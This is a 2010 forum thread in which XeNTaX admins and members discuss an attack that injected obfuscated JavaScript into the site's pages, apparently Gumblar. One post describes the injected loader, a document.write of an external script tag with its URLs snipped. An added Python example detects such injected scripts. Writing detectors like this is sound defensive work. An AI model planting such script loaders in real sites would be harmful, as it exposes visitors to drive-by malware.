XeNTaX attacked by virus

Mr.Mouse
Site Admin
Posts: 4051
Joined: Wed Jan 15, 2003 6:45 pm
Location: Dungeons of Doom
Has thanked: 421 times
Been thanked: 575 times

Re: XeNTaX attacked by virus

Post by Mr.Mouse » Sun Aug 29, 2010 5:12 pm

Yes. We will try to get everything back in. For now, new registrations have been disabled.

Dinoguy1000
Site Admin
Posts: 759
Joined: Mon Sep 13, 2004 1:55 am
Has thanked: 129 times
Been thanked: 142 times

Re: XeNTaX attacked by virus

Post by Dinoguy1000 » Mon Aug 30, 2010 2:55 am

XpoZed wrote: I don't think there was a virus that is downloaded on your PC. It's more likely a session/cookie stealer or something.
Anyway, if someone can provide me with a sample (exe, dll, ocx, sys, etc.) I'll be happy to reverse engineer it (that's my main hobby these days ;)).

It was almost certainly Gumblar, based on de-obfuscating the obfuscated JavaScript which was inserted on numerous pages. Maybe not a virus, true, but still some type of malware.

It's worth noting that people with properly-upgraded Windows systems and Acrobat/Flash installations may not have had anything to worry about, but you should still run a virus scan just in case (this is one of the basic maintenance tasks you should be regularly running anyways).

One last note, we don't load any scripts, images, or other resources from external URLs (to the best of my knowledge; there may be a couple of images on the wiki loaded from Wikimedia Commons), so you should be able to safely block any such resources from loading.
Welcome to Xentax!

Rules | Requests | Wiki | Discord

If you run across a post that breaks the rules, please report the post - a mod or admin will handle it from there.

Re: XeNTaX attacked by virus

Post by Mr.Mouse » Mon Aug 30, 2010 6:38 am

chrrox wrote: I'm using Firefox; it's only the mark forum read that does not work for me. I can go into any thread and the mark read works.

Hmm. http://www.phpbb-seo.com/en/phpbb-forum ... e3678.html This seems to be a phpbb issue

DMorrone
Moderator
Posts: 4
Joined: Sat Aug 28, 2010 5:01 pm
Been thanked: 3 times

Re: XeNTaX attacked by virus

Post by DMorrone » Mon Aug 30, 2010 4:45 pm

Mr.Mouse wrote:
chrrox wrote: I'm using Firefox; it's only the mark forum read that does not work for me. I can go into any thread and the mark read works.
Hmm. http://www.phpbb-seo.com/en/phpbb-forum ... e3678.html This seems to be a phpbb issue

Looking at it again, it's an issue back in 2008, so I'm not sure how relevant it is now. Working in Chrome, the button functions as desired. We're still looking into it.

Captain
Site Admin
Posts: 249
Joined: Wed Jan 15, 2003 6:25 pm
Location: Home
Has thanked: 2 times
Been thanked: 61 times

Re: XeNTaX attacked by virus

Post by Captain » Mon Aug 30, 2010 6:00 pm

DMorrone wrote: Working in Chrome, the button functions as desired. We're still looking into it.

The button works in the subsections, like here, but doesn't work on the main forum index. I'm pretty sure it's not a browser issue. Tried it myself on Chrome, same result as in Firefox.

Re: XeNTaX attacked by virus

Post by DMorrone » Mon Aug 30, 2010 7:16 pm

Craptain wrote:
DMorrone wrote: Working in Chrome, the button functions as desired. We're still looking into it.
The button works in the subsections, like here, but doesn't work on the main forum index. I'm pretty sure it's not a browser issue. Tried it myself on Chrome, same result as in Firefox.

Looks like there is a very recent debate as to how this button should ultimately function:

http://www.phpbb.com/community/viewtopi ... &t=2101636

Polefish
veteran
Posts: 94
Joined: Sat Jun 20, 2009 1:47 pm
Has thanked: 16 times
Been thanked: 13 times

Re: XeNTaX attacked by virus

Post by Polefish » Tue Aug 31, 2010 6:24 pm

Damn I was fucked hard by this virus. Wasn't able to work for 2 days cause of this shit.

XpoZed
veteran
Posts: 144
Joined: Sat Oct 24, 2009 5:08 pm
Location: Bulgaria
Has thanked: 2 times
Been thanked: 45 times

Re: XeNTaX attacked by virus

Post by XpoZed » Tue Aug 31, 2010 6:29 pm

Can anyone send me the virus? The infected PDF or something will be fine too.

Re: XeNTaX attacked by virus

Post by Mr.Mouse » Tue Aug 31, 2010 6:39 pm

XpoZed wrote: Can anyone send me the virus? The infected PDF or something will be fine too.

Turns out our computers were clean, or at least a multitude of scanners found nothing.

But whatever it was and where it came from, it injected the site's pages with this:

Rheini
Moderator
Posts: 653
Joined: Wed Oct 18, 2006 9:48 pm
Location: Germany
Has thanked: 19 times
Been thanked: 40 times

Re: XeNTaX attacked by virus

Post by Rheini » Tue Aug 31, 2010 6:55 pm

I didn't notice anything? What happens if you visit a site that's infected with it?
And what about the pdf etc. stuff? xentax doesn't use anything like flash, pdf...

Re: XeNTaX attacked by virus

Post by XpoZed » Tue Aug 31, 2010 7:13 pm

Mr.Mouse wrote: Turns out our computers were clean, or at least a multitude of scanners found nothing.

But whatever it was and where it came from, it injected the site's pages with this:

Thanks, but I've already got this... it just does a document.write('<script type="text/javascript" src="URL SNIP"> </script>')
Then from URL SNIP we had a similar script that does a document.write with a script again, this time to something like URL SNIP, and there was only a redirect to google.com :?
That's why I've said that this is probably only a logger.

Anyway, if someone got the virus, I'll be happy to play with his bits'n bytes. ;)

@Rheini I've seen similar JavaScript exploits like this one, that redirect the user to a PDF document with an exploit in it. And if you already have Acrobat Reader installed, that is exploitable (old version etc.), you get infected.
Last edited by Dinoguy1000 on Wed Sep 01, 2010 12:56 am, edited 2 times in total.
Reason: URL snip - no need to encourage visitors to visit a malicious site
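
An added example (not part of the thread and not code from any poster): one way a site owner could audit served pages for the pattern XpoZed describes, a script tag with an external src written through document.write, on a site that, as Dinoguy1000 notes, should load no external scripts. The allowed host, the sample page and the injected URL are constructed placeholders, and the check only sees script text that is already de-obfuscated.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the only host this site should ever load scripts from.
ALLOWED_HOSTS = {"forum.example.org"}
# src value of a <script> tag that is passed to document.write(...)
WRITTEN_SRC = re.compile(
    r"""document\.write\s*\([^)]*?<script\b[^>]*?\bsrc\s*=\s*\\?["']?([^"'\s>\\]+)""",
    re.IGNORECASE)

# Constructed sample page: one legitimate local script, one injected loader.
SAMPLE_PAGE = r"""<html><head>
<script src="/styles/forum_fn.js"></script>
<script type="text/javascript">
document.write('<script type="text/javascript" src="http://injected.example.invalid/x.js"> <\/script>');
</script>
</head><body>forum index</body></html>"""

class ScriptAudit(HTMLParser):
    """Collects script URLs, both static src attributes and written ones."""
    def __init__(self):
        super().__init__()
        self.findings, self._buf, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script, self._buf = True, []
            src = dict(attrs).get("src")
            if src:
                self.findings.append(("static", src))

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)  # inline script body, may arrive in chunks

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            for m in WRITTEN_SRC.finditer("".join(self._buf)):
                self.findings.append(("document.write", m.group(1)))

def external_script_hosts(html, allowed=ALLOWED_HOSTS):
    """Return (kind, host) for every script loaded from a host not allowed."""
    audit = ScriptAudit()
    audit.feed(html)
    audit.close()
    hosts = [(kind, urlparse(url).hostname) for kind, url in audit.findings]
    # Relative URLs have no hostname and stay on the site itself.
    return [(k, h) for k, h in hosts if h and h not in allowed]
```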

Re: XeNTaX attacked by virus

Post by Rheini » Tue Aug 31, 2010 7:29 pm

Thank god I don't have that damn Acrobat Reader installed at all (Foxit <3)
I do have Flash though (with Opera)

Re: XeNTaX attacked by virus

Post by Mr.Mouse » Wed Sep 01, 2010 9:57 pm

Registrations are back on.

Re: XeNTaX attacked by virus

Post by Dinoguy1000 » Wed Sep 01, 2010 10:30 pm

Awesome! :mrgreen: *registers 839583 dummy accounts* :]

Zerox
mega-veteran
Posts: 186
Joined: Mon Aug 09, 2010 3:50 am
Has thanked: 4 times
Been thanked: 7 times

Re: XeNTaX attacked by virus

Post by Zerox » Fri Sep 10, 2010 9:41 pm

While attempting to go to the page to download Noesis I got this while using firefox:

Image

This is the link I followed: http://oasis.xentax.com/index.php?content=downloads

Edit: I see it was already reported in his Noesis thread. My apologies.
